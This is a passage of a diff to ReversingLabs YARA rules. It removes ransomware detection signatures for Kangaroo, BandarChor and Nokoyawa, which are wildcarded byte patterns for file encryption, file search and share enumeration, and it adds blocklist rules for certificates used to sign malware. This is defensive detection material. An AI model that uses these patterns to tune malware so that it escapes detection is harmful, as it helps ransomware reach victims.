"https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L15720-L15736" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "f55835c7404edab96bc5c8fe3844f3380f1f6bc8b43da1d51213de899629e8f5" + score = 75 + quality = 90 + tags = "INFO, FILE" + status = "RELEASED" + sharing = "TLP:WHITE" + category = "INFO" + importance = 25 condition: - uint16(0)==0x5A4D and ( all of ($find_files_p*)) and ($encrypt_files) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Yu Bao" and pe.signatures[i].serial=="12:3a:50:74:06:91:62:f4:ed:68:fc:7d:48:f4:64:c2" and 1472428800<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Kangaroo : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_64Eb04B8Def382B5Efa75F63E0E85Ad0 : INFO FILE { meta: - description = "Yara rule that detects Kangaroo ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "ec4342c1-adc9-5ddb-b403-83c2b1ce5899" - date = "2020-07-15" - modified = "2020-07-15" + id = "5f4da614-3bc8-5ae8-b04b-e4b3972522ff" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.Kangaroo.yara#L1-L91" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "1078fb3d47ad737548419e5ee66e686f705c02fea27a58c0097446547325772c" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L15738-L15754" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "03adb8a9bf2a8f0633b34d5c39816b47e60b9e598208f7de79ad9d9a7ab8cc5e" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Kangaroo" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $encrypt_files_p1 = { - 83 EC ?? 53 55 8B 6C 24 ?? 56 57 33 FF 57 57 6A ?? 57 6A ?? 68 ?? ?? ?? ?? 33 DB 55 - 89 5C 24 ?? 89 7C 24 ?? 89 7C 24 ?? FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 0F 84 ?? ?? ?? - ?? 8D 44 24 ?? 50 8D 4C 24 ?? 51 8D 54 24 ?? 52 56 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? - 6A ?? 68 ?? ?? ?? ?? 57 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? - 8B 54 24 ?? 8D 4C 24 ?? 51 57 57 68 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 85 - ?? ?? ?? ?? 57 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 03 C0 50 8B 44 24 ?? 68 ?? ?? ?? ?? - 50 FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 8B 54 24 ?? 8B 44 24 ?? 8D 4C 24 ?? - 51 6A ?? 52 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 57 56 FF - 15 ?? ?? ?? ?? 8B 54 24 ?? 57 8D 4C 24 ?? 51 57 57 6A ?? 57 52 89 44 24 ?? FF 15 ?? - ?? ?? ?? 8B 44 24 ?? 6A ?? 68 ?? ?? ?? ?? 50 57 8B 3D ?? ?? ?? ?? FF D7 8B 54 24 - } - $encrypt_files_p2 = { - 6A ?? 8D 4C 24 ?? 51 52 8B D8 53 56 FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 8B - 44 24 ?? 8B 54 24 ?? 50 8D 4C 24 ?? 51 53 6A ?? 6A ?? 6A ?? 52 FF 15 ?? ?? ?? ?? 83 - F8 ?? 0F 85 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 56 FF 15 ?? ?? ?? ?? - 8B 4C 24 ?? 6A ?? 8D 44 24 ?? 50 51 53 56 FF 15 ?? ?? ?? ?? 83 F8 ?? 75 ?? 8D 54 24 - ?? 52 8D 44 24 ?? 50 8D 4C 24 ?? 51 56 FF 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 6A ?? - 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF D7 68 ?? ?? ?? ?? 55 8B F8 68 ?? ?? ?? ?? 57 - FF 15 ?? ?? ?? ?? 83 C4 ?? 57 55 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 57 FF 15 ?? - ?? ?? ?? 8B C5 C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 53 FF 15 - ?? ?? ?? ?? 8B 54 24 ?? 52 FF 15 ?? ?? ?? ?? 8B 5C 24 ?? 33 FF 8B 44 24 ?? 50 FF 15 - ?? ?? ?? ?? 89 7C 24 ?? 8B 4C 24 ?? 57 51 FF 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 5F - 5E 5D 8B C3 5B 83 C4 ?? C3 - } - $find_files = { - 55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? 53 56 8B 75 ?? 57 56 FF 15 ?? ?? ?? ?? 8B 3D ?? - ?? ?? ?? 33 C9 83 F8 ?? 0F 94 C1 56 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 89 4C 24 - ?? FF D7 83 C4 ?? 8D 44 24 ?? 50 8D 8C 24 ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 89 44 24 - ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? EB ?? EB ?? 8D A4 24 ?? ?? ?? ?? 90 - 8B 3D ?? ?? ?? ?? 83 7C 24 ?? ?? 75 ?? 8D 54 24 ?? 52 56 68 ?? ?? ?? ?? 8D 84 24 ?? - ?? ?? ?? 50 EB ?? 8D 4C 24 ?? 51 56 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 52 FF D7 83 - C4 ?? F6 44 24 ?? ?? 74 ?? 8B 3D ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D7 85 - C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4C 24 ?? 51 FF D7 85 C0 0F 84 ?? ?? ?? ?? 8D - 94 24 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 33 FF 33 F6 EB ?? 8D 9B - ?? ?? ?? ?? 8B 86 ?? ?? ?? ?? 50 8D 8C 24 ?? ?? ?? ?? 51 FF D3 85 C0 74 ?? BF ?? ?? - ?? ?? 83 C6 ?? 83 FE ?? 72 ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 52 FF D3 85 C0 75 - ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D3 85 C0 74 ?? BF ?? ?? ?? ?? 8B 44 24 - ?? A8 ?? 75 ?? A9 ?? ?? ?? ?? 75 ?? 85 FF 75 ?? 3D ?? ?? ?? ?? 74 ?? 68 ?? ?? ?? ?? - 8D 8C 24 ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 - C4 ?? 85 C0 75 ?? 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 8C - 24 ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 8B 75 ?? 8B 44 24 ?? 8D 54 24 ?? 52 50 FF 15 ?? - ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 4C 24 ?? 51 FF 15 ?? ?? ?? ?? 5F 5E 5B 8B E5 5D - C3 - } - $enum_resources = { - 55 8B EC 83 E4 ?? 83 EC ?? 8B 4D ?? 53 56 57 8D 44 24 ?? 50 51 6A ?? 6A ?? 6A ?? C7 - 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 33 C0 5F 5E - 5B 8B E5 5D C2 ?? ?? 8B 54 24 ?? 52 6A ?? FF 15 ?? ?? ?? ?? 8B D8 85 DB 74 ?? 8B 4C - 24 ?? 8B C3 85 C9 74 ?? 8D 64 24 ?? C6 00 ?? 40 83 E9 ?? 75 ?? 8B 54 24 ?? 8D 44 24 - ?? 50 53 8D 4C 24 ?? 51 52 E8 ?? ?? ?? ?? 85 C0 75 ?? 33 FF 39 7C 24 ?? 76 ?? 8D 73 - ?? 8D 49 ?? 83 7E ?? ?? 75 ?? 8B 06 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4E ?? 83 E1 ?? 80 - F9 ?? 75 ?? 8D 56 ?? 52 E8 ?? ?? ?? ?? 47 83 C6 ?? 3B 7C 24 ?? 72 ?? EB ?? 3D ?? ?? - ?? ?? 75 ?? 53 FF 15 ?? ?? ?? ?? 8B 44 24 ?? 50 E8 ?? ?? ?? ?? 5F 5E B8 ?? ?? ?? ?? - 5B 8B E5 5D C2 - } - condition: - uint16(0)==0x5A4D and ($find_files) and ( all of ($encrypt_files_p*)) and ($enum_resources) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "TOV \"MARIYA\"" and pe.signatures[i].serial=="64:eb:04:b8:de:f3:82:b5:ef:a7:5f:63:e0:e8:5a:d0" and 1535587200<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Bandarchor : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_76D8D908Eed2F9857Dc5676A680Ceac9 : INFO FILE { meta: - description = "Yara rule that detects BandarChor ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "c645a081-7ff6-58fc-af8e-55f43f56d0ea" - date = "2020-07-15" - modified = "2020-07-15" + id = "f7eae73e-6b12-5507-846e-d3b409243adf" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.BandarChor.yara#L1-L97" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "1c0c33ef7de089fc7ed6b364c7693499d1a93f79a48d6f2a5c375e47aea176bc" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L15756-L15772" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "87f9930967d5832d3003672eeb89669b54feed1ca2ea5eec478c50e3cb7a7571" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "BandarChor" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $file_extensions_1 = { - 55 8B EC B9 ?? ?? ?? ?? 6A ?? 6A ?? 49 75 F9 51 53 89 55 ?? 8B D8 8B 45 ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? - ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? - 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? - ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 4D ?? 8B 95 ?? - ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 E0 ?? 83 F8 ?? 0F 85 F9 00 00 00 8D 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? - ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? - E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 - ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? - ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? - ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? - ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 55 ?? 8B C3 E8 4F FE FF FF E9 ?? ?? ?? ?? 8D 95 - } - $file_extensions_2 = { - ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? - E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? - ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 - ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? - ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 - ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? - ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? - ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? - ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? - ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 - } - $file_extensions_3 = { - 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? - ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? - ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? - ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B - 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? - ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? - 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? - ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 - ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? - 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B - 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 - } - $file_extensions_4 = { - 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? - ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D - 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 - ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F - 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? - ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 - ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? - E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 - } - $file_extensions_5 = { - ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? - ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? - ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 - ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? - ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? - BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? - ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? - ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 - } - $parse_server_commands = { - 83 F9 ?? 0F 84 E0 00 00 00 50 53 56 57 89 C3 89 D6 89 CF 31 D2 8A 06 8A 56 ?? 3C ?? 74 25 3C ?? 74 3E 3C ?? 74 51 3C ?? - 74 5C 3C ?? 74 76 3C ?? 0F 84 84 00 00 00 3C ?? 0F 84 8B 00 00 00 E9 97 00 00 00 83 F9 ?? 89 D8 7F 0A E8 ?? ?? ?? ?? E9 - 91 00 00 00 89 CA E8 ?? ?? ?? ?? E9 85 00 00 00 83 F9 ?? 89 D8 7F 07 E8 ?? ?? ?? ?? EB 77 89 CA E8 ?? ?? ?? ?? EB 6E 89 - D8 83 C3 ?? E8 ?? ?? ?? ?? 4F 7F F3 EB 5F 55 89 D5 8B 54 2E ?? 89 D8 03 5C 2E ?? 8B 4C 2E ?? 8B 12 E8 62 FF FF FF 4F 7F - E8 5D EB 41 55 89 D5 89 D8 03 5C 2E ?? 89 F2 E8 ?? ?? ?? ?? 4F 7F F0 5D EB 2B 89 D8 83 C3 ?? E8 ?? ?? ?? ?? 4F 7F F3 EB - 1C 89 D8 89 F2 83 C3 ?? E8 ?? ?? ?? ?? 4F 7F F1 EB 0B 5F 5E 5B 58 B0 ?? E9 ?? ?? ?? ?? 5F 5E 5B 58 C3 8B C0 B9 ?? ?? ?? - ?? E9 0A FF FF FF C3 - } - condition: - uint16(0)==0x5A4D and (($file_extensions_1 and $file_extensions_2 and $file_extensions_3 and $file_extensions_4 and $file_extensions_5) and $parse_server_commands) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Yu Bao" and pe.signatures[i].serial=="76:d8:d9:08:ee:d2:f9:85:7d:c5:67:6a:68:0c:ea:c9" and 1467158400<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win64_Ransomware_Nokoyawa : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_083E3F : INFO FILE { meta: - description = "Yara rule that detects Nokoyawa ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "31470ce4-381f-50d2-bbca-03c592e62a7d" - date = "2022-06-06" - modified = "2022-06-06" + id = "b9a1b1a7-2333-5a6f-85c9-6c19d34c4aa4" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win64.Ransomware.Nokoyawa.yara#L1-L104" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "85b7d93db06007d0043b1489b532410ccc700cf082b641fff8a09de2ffe9101d" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L15774-L15790" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "6977d48a2e31235d780cba1b84b39a90e409ee8ea5555e01cbc34989ecd3882d" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Nokoyawa" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $enum_shares = { - 48 89 4C 24 ?? 48 81 EC ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? - 48 8D 44 24 ?? 48 89 44 24 ?? 4C 8B 8C 24 ?? ?? ?? ?? 45 33 C0 33 D2 B9 ?? ?? ?? ?? - FF 15 ?? ?? ?? ?? 89 44 24 ?? 83 7C 24 ?? ?? 74 ?? 33 C0 E9 ?? ?? ?? ?? 8B 44 24 ?? - 8B D0 B9 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 89 44 24 ?? 48 83 7C 24 ?? ?? 75 ?? 33 C0 - E9 ?? ?? ?? ?? 8B 44 24 ?? 44 8B C0 33 D2 48 8B 4C 24 ?? E8 ?? ?? ?? ?? 4C 8D 4C 24 - ?? 4C 8B 44 24 ?? 48 8D 54 24 ?? 48 8B 4C 24 ?? FF 15 ?? ?? ?? ?? 89 44 24 ?? 83 7C - 24 ?? ?? 0F 85 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? EB ?? 8B 44 24 ?? FF C0 89 44 24 - ?? 8B 44 24 ?? 39 44 24 ?? 73 ?? 48 8B 44 24 ?? 83 78 ?? ?? 75 ?? 8B 44 24 ?? 48 6B - C0 ?? 48 8B 4C 24 ?? 48 8B 54 01 ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? - ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 48 6B C0 - ?? 48 8B 4C 24 ?? 8B 44 01 ?? 83 E0 ?? 83 F8 ?? 75 ?? 8B 44 24 ?? 48 6B C0 ?? 48 8B - 4C 24 ?? 48 03 C8 48 8B C1 48 8B C8 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? EB ?? 81 7C 24 ?? - ?? ?? ?? ?? 74 ?? EB ?? 81 7C 24 ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 48 8B 4C 24 ?? FF - 15 ?? ?? ?? ?? 48 8B 4C 24 ?? FF 15 - } - $find_files_p1 = { - FF 15 ?? ?? ?? ?? 48 89 44 24 ?? 48 83 7C 24 ?? ?? 0F 84 ?? ?? ?? ?? 8B 44 24 ?? 83 - E0 ?? 85 C0 0F 84 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 85 - C0 0F 84 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 85 C0 0F 84 - ?? ?? ?? ?? 48 8D 4C 